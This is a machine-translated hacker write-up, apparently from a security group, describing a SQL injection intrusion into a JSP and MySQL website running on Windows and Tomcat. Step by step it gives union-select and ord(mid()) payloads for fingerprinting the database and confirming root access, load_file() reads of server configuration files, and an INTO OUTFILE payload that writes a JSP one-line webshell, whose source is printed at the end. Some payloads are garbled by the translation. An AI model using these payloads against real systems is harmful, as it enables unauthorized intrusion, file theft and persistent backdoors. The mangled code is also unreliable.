A windows + MYSQL + jsp penetration tour

Author: zookeeper x [BHST]

I. Cause

Recently, I have nothing to worry about. I am wandering around the Internet. I think it's better that I haven't posted any articles in my group for a long time. Let's take a look at the injection of a JSP.

Ii. Operation started

Target: http://www.xxx.cn/MainMessage.jsp? Id = 7676

Directly add single quotes 1
 

It is concluded that the database is MYSQL database and continues to submit and 1 = 1 and 1 = 2, 3
 


 

The injection vulnerability is obvious. The JSP and PHP injection methods in MYSQL are basically the same. They both use query statements to expose the Administrator's user and password. If it is root, attackers can also read arbitrary files on the server, to quickly achieve the goal. Since there is an injection vulnerability, let's take a look at the MYSQL version. If it is later than 4.0, we can use union to join the query. Add and ord (mid (version (),) after the URL)> 51/*, return 4
 

The page returns normal. This indicates that the MYSQL version is later than 4.0, because the first ASCII code of the database is greater than 51, that is, greater than 3. Since it is later than 3, it indicates that the MYSQL version is later than 4.0, in this way, we can use the union query. Now let's determine the number of fields, use the order by number/* to determine, and add order by 10/* after the URL to return normal 5
 

The number of fields is greater than 10. Continue to submit order by 20/* Error 6 returned
 

It indicates that the number of fields is less than 20, that is, between 10 and 20. If order by 15/* is submitted, the system returns normal. If order by 16/* is submitted, an error is returned. 15 normal 16 errors indicate that the number of fields is 15. After determining the number of fields, the next step is the union query. After the URL is submitted and 1 = 2 union select, 15/* The page we want is not displayed
 


Is the number of fields incorrect ?? Let's take a closer look at the number 11 in the first line. Is this the position of the number of fields? Let's try, replace Location 11 with database (), submit and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, database (), 12, 13, 14,15/* 8
 



Have you seen it? The database name is bicpa. Change to user () at Location 11 and return 9.
 


The current user is root. Then let's confirm and submit them separately.

1. and ord (mid (user (), 1, 1) = 114 /*
2. and ord (mid (user (), 2, 1) = 111 /*
3. and ord (mid (user (), 3, 1) = 111 /*
4. and ord (mid (user (), 4, 1) = 116 /*



Returns normal. The four statements indicate that the current user's permission is root, because the first ASCII code 114 indicates that the first character is r, and the second ASCII Code indicates that the second character is o, the third is o, and the fourth is t. Let's further confirm that we should replace them at the position on 11.

1. system_user ()
2. current_user ()



All are returned to the root account, but now we can determine the root permission.

Iii. Chu Chuge

Since it is root, we can use the load_file () function to read files on the server and insert our Code directly into the server. The current idea is very clear. The first one is to find the web directory of the service, and then directly write a sentence or an external shell. Now let's determine what the system is and connect directly to the terminal (provided that the terminal is enabled and the terminal port is known). You can also use load_file () to read c: oot. ini. Now we use load_file () to read c: oot. ini and submit

1. and 1 = 2 union select 111,111,116, 46,105,110,105, 10, load_file (char /*
2. (Note: 111,111,116, 46,105,110,105, is the ASCII code of c: oot. ini)

Return 10
 


If the read operation is normal, it indicates that the system is windows 2003.
Now we need to find the web directory and insert a sentence using into outfile.
Let's take a look at the Tomcat configuration file submission.

1. and 1 = 2 union select 111,109, 99,111,110,102, 92,115,101,114,118,101,114, 10, load_file (cha, 46,120,109,108 ))

, 12, 13, 14, 15 /*
2. (Note: 111,109, 99,111,110,102, 92,115,101,114,118,101,114, 46,120,109,108, is the acⅱ code of D: Tomcat 5.0confserver.xml)



11
 


Can be read normally, continue to submit

1. and 1 = 2 union select 111,109, 119,101, 112,112,115, load_file (char, 92,114,111,111,116, 92,119,101,

98,45, 105,110,102, 92,115,116,114,117,116,115, 111,110,102,105,103, 46,120,109,108 /*
2. (Note: 111,109, 119,101, 112,112,115, 92,114,111,111,116, 92,119,101,

98,45, 105,110,102, 92,115,116,114,117,116,115, 111,110,102,105,103, 46,120,109,108
3. For D: Tomcat 5.0webappsootweb-ACSII code of infstruts-config.xml)



But it is a pity that it is not read, 12
 


Now, the web directory cannot write a sentence to the web, which is really depressing. Smoke for a moment,

Remember that wwwscan can scan many sensitive directories. You have to give it a try now.
Run the wwwscan site command to enter the Domain Name of the vwwwscan.exe site or IP address-m 300-t 30.
Scan Result 13
 

When I access com3, the web path is displayed.
 

Note: D: chinacom3 (the system cannot find the specified file .) I believe everyone understands everything. D: china is the web path. Now the conditions for writing a sentence are ready. What we need to do is to write our one-sentence Trojan into it.
Submit

1. and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 0x3c25696628450571756573742e676574506172616d657465722822662229213d6e7

Bytes

Bytes

Bytes

97465732829293B253E into outfile D: chinajsp. jsp, 12,13, 14,15 /*
2. (Note: accept

Bytes

Bytes

Bytes



Is

1. <% if (request. getParameter ("f ")! = Null) (new java. io. fileOutputStream (application. getRealPath ("\") + request. getParameter ("f "))). write (request. getParameter ("t ").